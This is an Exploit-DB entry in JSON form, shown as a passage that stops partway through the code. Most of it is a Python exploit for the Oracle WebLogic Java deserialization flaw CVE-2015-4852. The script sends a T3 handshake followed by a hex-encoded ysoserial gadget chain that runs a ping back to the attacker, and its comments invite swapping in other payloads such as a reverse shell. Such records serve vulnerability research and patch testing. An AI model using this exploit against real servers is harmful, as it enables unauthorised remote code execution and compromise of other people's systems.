{"lastseen": "2017-09-29T13:53:41", "osvdbidlist": [], "references": [], "description": "Oracle WebLogic Server 10.3.6.0 - Java Deserialization. CVE-2015-4852. Remote exploit for Java platform", "reporter": "Exploit-DB", "published": "2017-09-27T00:00:00", "type": "exploitdb", "title": "Oracle WebLogic Server 10.3.6.0 - Java Deserialization", "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2017-09-29T13:53:41", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4852"]}, {"type": "f5", "idList": ["F5:K30518307", "SOL30518307"]}, {"type": "zdt", "idList": ["1337DAY-ID-30269", "1337DAY-ID-28661"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108067", "OPENVAS:1361412562310806622", "OPENVAS:1361412562310105829"]}, {"type": "exploitdb", "idList": ["EDB-ID:44552", "EDB-ID:46628"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL30518307.NASL", "WEBLOGIC_2015_4852.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152268", "PACKETSTORM:144405"]}, {"type": "saint", "idList": ["SAINT:EA211AC1CE6B335FAB2D22929BF61475", "SAINT:364F42DDB229F6E8A0EF4BB04CE504D2", "SAINT:B8E045060F9ACF0F8D488745DBF66B54"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:028DB84C4840B8D96405811A4FA47345"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE_RAWOBJECT"]}, {"type": "canvas", "idList": ["WEBLOGIC_T3_DESERIALIZATION"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784367"]}, {"type": "cert", "idList": ["VU:576313"]}, {"type": "kitploit", "idList": ["KITPLOIT:5052987141331551837"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2016-2881722", "ORACLE:CPUJAN2018-3236628", "ORACLE:CPUOCT2017-3236626", "ORACLE:CPUAPR2017-3236618", "ORACLE:CPUJAN2016-2367955"]}], "modified": "2017-09-29T13:53:41", "rev": 2}, "vulnersScore": 6.3}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4852"], "modified": "2017-09-27T00:00:00", "id": "EDB-ID:42806", "href": "https://www.exploit-db.com/exploits/42806/", "viewCount": 1590, "sourceData": "# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution]\r

# Date: [27/09/2017]\r

# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\r

# Vulnerability Author: FoxGloveSecurity\r

# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html]\r

# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0]\r

# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr]\r

# CVE : [CVE-2015-4852]\r

\r

'''\r

This exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send\r

Ping requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful.\r

Feel free to modify the payload(chunk2) with that of your choice. Don't worry about modiyfing the payload length each time you change the payload as \r

this script will do it for you on the fly.\r

\r

Note: I tried to get a bash one liner reverse shell payload working but that did not work on my target for some reason. Please let me know if you get it working :)\r

'''\r

\r

#!/usr/bin/env python\r

import socket\r

import sys\r

import struct\r

from binascii import unhexlify\r

\r

print \"\

[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit...\"\r

print \"[+]Here is the command:\

\\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\

\"\r

\r

if len(sys.argv) < 2:\r

\tprint \"\

[+]Please provide target IP and Port...\"\r

\tprint \"[+]Usage:\

\\t ./weblogic_linuxPing.py <target_ip> <target_port>\"\r

\tsys.exit()\r

\r

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r

server_address = (sys.argv[1], int(sys.argv[2]))\r

print '[+]Connecting to %s port %s' % server_address\r

sock.connect(server_address)\r

\r

#Send headers\r

headers='t3 12.2.1\

AS:255\

HL:19\

MS:10000000\

PU:t3://us-l-breens:7001\

\

'\r

print '[+]Sending\

\"%s\"' % headers\r

sock.sendall(headers)\r

\r

data = sock.recv(1024)\r

print >>sys.stderr, '\

[+]Received \"%s\"' % data\r

\r

\r

#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload.\r

#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length\r

chunk1='\\x00\\x00\\x0b\\x4d\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r

\r

\r

#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out\r

#len(payload) is xxxx bytes\r

#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target.\r

#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload.\r

\r

#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :)\r

chunk2 = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x19\\x70\\x69\\x6e\\x67\\x20\\x2d\\x63\\x20\\x34\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x32\\x35\\x33\\x2e\\x31\\x33\\x30\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x23\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a\"\r

\r

\r

chunk3\t= '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78'\r

\r

totallength = len(chunk1) + len(chunk2) + len(chunk3)\r

print \"[+]TOTAL payload length: \", totallength\r

\r

#Update the TOTAL payload length in Chunk1\r

len_hex = hex(totallength)\r

print \"[+]Payload length in HEX: \", len_hex\r

len_hex = len_hex.replace('0x', '0')\r

print \"[+]Payload length in HEX: \" , len_hex\r

\r

s1 = len_hex[:2]\r

s2 = len_hex[2:4]\r

len_hex = unhexlify(s1 + s2)\r

\r

print \"[+]Payload length in HEX now: \", len_hex\r

\r

#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2)\r

print \"[+]Updating Chunk1 according to the TOTAL payload length...\"\r

\r

chunk1 = '\\x00\\x00' + len_hex + '\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x7